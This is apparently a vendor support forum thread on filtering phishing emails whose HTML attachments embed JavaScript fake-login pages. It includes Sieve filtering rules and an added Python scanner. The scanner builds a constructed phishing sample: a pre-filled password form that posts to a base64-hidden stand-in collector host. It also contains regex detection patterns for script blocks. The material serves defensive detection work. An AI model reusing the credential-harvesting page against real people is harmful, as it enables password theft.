Blocking phishing attempts sent as HTML attachments with JavaScript | MDaemon Technologies, Ltd.

Blocking phishing attempts sent as HTML attachments with JavaScript


  • We have received a number of phishing attempts where the attachment was a larger HTML file with a JavaScript code block embedded in it.

    The attachment consists of all of the images etc. required to display a fake login page with the user's e-mail address pre-filled in, ready to submit the user's e-mail address and password to a Base64-encoded URL.

    How would we go about creating a rule to block HTML attachments with a script block?

    We don't want to just block all HTML attachments, as we don't see a way to report on how many of the HTML attachments we get are legitimate.



  • Would something like the following work?

    require ["mime", "foreverypart", "reject", "body"];

    # Walk every MIME part. An HTML attachment may be named in either
    # Content-Disposition (filename=) or Content-Type (name=), so both
    # parameters are checked.
    foreverypart {
        if allof (
            header :mime :param ["filename", "name"] :matches
                ["Content-Disposition", "Content-Type"] ["*.htm", "*.html"],
            body :content "text/html" :contains "<script"
        ) {
            reject "Email rejected due to HTML attachment containing JavaScript.";
            stop;
        }
    }


  • SecurityGateway doesn't seem to support the 'mime' extension, so the above doesn't work.


  • I was able to create a rule that I think may do what I want. Testing now.

    require ["securitygateway","fileinto","body"];
    # :raw searches the message body as transmitted, before any MIME
    # decoding, so a base64-encoded HTML attachment will not match here.
    if body :raw :contains ["<script", "</script>"]
    {
        fileinto "admin";
        stop;
    }


  • Shaun,

    Can you send me (matt.mcdermott@mdaemon.com) a couple of example messages?


  • Hello Matt,

    I have sent you 2 examples just a minute ago.


  • Delivery has failed to these recipients:
    matt.mcdermott@mdaemon.com

    Subject: FW: Sheet ref-4928 For info@optrics.com only

    Remote Server returned: '550 Sorry, this message contains Phishing.HTML.Doc virus'

    🤣


  • If our MDaemon server detected it as a virus, I would expect SecurityGateway to as well. I do not have access to our server at the moment, but I will have the admin review the logs.

    I would confirm that Ikarus AV is enabled.

    You can upload the message (.eml file) to https://mdaemon.sharefile.com/r-rc3922c1eed334d4dbf5e34f0bd04ccd6 and I will test with it.

    This script should accomplish what you are looking for.

    require ["securitygateway","fileinto","body", "regex"];
    # :content decodes the transfer encoding of the listed part types before
    # matching, so base64-encoded attachments are inspected as well.
    # application/octet-stream covers HTML files sent with a generic content
    # type. "<script[^>]*>" allows attributes such as type="text/javascript",
    # which a bare "<script>" would miss.
    if body :content ["text/html", "application/octet-stream"] :regex "(?s)<script[^>]*>.*?</script>"
    {
        fileinto "admin";
        stop;
    }

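As an added example (not part of the thread, and not SecurityGateway's or MDaemon's own code), the Python script below does offline what the two posted rules do on the gateway: it walks a message, decodes each HTML attachment, and flags those carrying a script block. It also shows why the `body :raw :contains` rule from the earlier post misses a base64-encoded attachment while the `body :content` rule in the post above catches it, and it decodes any base64 literal passed to atob() to recover the URL the fake form posts to. The message, attachment, file name and all domains are constructed for the example; the helper names (`scan_message`, `raw_contains_script`, `build_sample`) are assumptions of this example.

```python
"""Offline check for HTML attachments that carry a <script> block.
Added example with constructed sample input; no real messages or domains."""
import base64
import binascii
import email
import re
from email import policy
from email.message import EmailMessage

# "<script" followed by whitespace or ">" so attributes are allowed but a
# word such as "<scripture" is not matched.
SCRIPT_RE = re.compile(rb"<script[\s>]", re.IGNORECASE)
# Base64 literal handed to atob(): how these pages usually hide the URL that
# receives the harvested credentials.
ATOB_RE = re.compile(rb"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


def raw_contains_script(raw: bytes) -> bool:
    """Mimic `body :raw :contains "<script"`: search the message as
    transmitted, with no MIME decoding at all."""
    return b"<script" in raw.lower()


def scan_message(raw: bytes) -> list[dict]:
    """Mimic `body :content ... :regex ...`: decode each part and inspect HTML
    attachments only. Returns one finding per offending attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename() or ""
        ctype = part.get_content_type()
        is_html = ctype == "text/html" or filename.lower().endswith((".htm", ".html"))
        # Attachments only: the inline text/html body of an ordinary mail has
        # no filename and no attachment disposition, so it is left alone.
        if not is_html or not (part.is_attachment() or filename):
            continue
        body = part.get_payload(decode=True) or b""  # transfer encoding removed
        if not SCRIPT_RE.search(body):
            continue
        urls = []
        for blob in ATOB_RE.findall(body):
            try:
                urls.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
            except (binascii.Error, ValueError):
                pass  # not valid base64: keep the finding, skip the URL
        findings.append({
            "filename": filename,
            "content_type": ctype,
            "transfer_encoding": str(part.get("Content-Transfer-Encoding", "")),
            "decoded_urls": urls,
        })
    return findings


def build_sample(attachment: bytes, filename: str = "Sheet.html",
                 maintype: str = "text", subtype: str = "html") -> bytes:
    """Constructed test message: a plain-text body plus one base64-encoded
    attachment, the shape of the messages described in the thread."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "info@example.invalid"
    msg["Subject"] = "Sheet for info only (constructed sample)"
    msg.set_content("Please see the attached sheet.")
    msg.add_attachment(attachment, maintype=maintype, subtype=subtype,
                       filename=filename, cte="base64")
    return msg.as_bytes()


# Constructed stand-in for the phishing attachment: a form with the address
# pre-filled and a script that decodes its target URL from base64.
EXFIL_URL = b"https://collector.example.invalid/post"
PHISH_HTML = (
    b"<html><body><form id='f'>"
    b"<input name='email' value='victim@example.invalid'>"
    b"<input name='password' type='password'></form>\n"
    b'<script type="text/javascript">\n'
    b"  document.getElementById('f').action = atob(\""
    + base64.b64encode(EXFIL_URL) + b"\");\n"
    b"</script></body></html>"
)
CLEAN_HTML = b"<html><body><p>Quarterly sheet, no script.</p></body></html>"

if __name__ == "__main__":
    raw = build_sample(PHISH_HTML)
    print("raw :contains sees <script>:", raw_contains_script(raw))  # base64 hides it
    for f in scan_message(raw):
        print("flagged", f["filename"], f["content_type"], f["transfer_encoding"],
              "exfil URLs:", f["decoded_urls"])
    print("clean sample findings:", scan_message(build_sample(CLEAN_HTML)))
```

Run it on a saved .eml with `scan_message(open("message.eml", "rb").read())` to see which attachment a gateway rule should have matched; the `transfer_encoding` field tells you whether a `:raw` rule had any chance of seeing the tag.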

  • Hello Matthew,

    I have uploaded 2 recent samples to sharefile and put this rule into testing.

    Ikarus AV is enabled and I see it is updating its signatures and scanning messages.

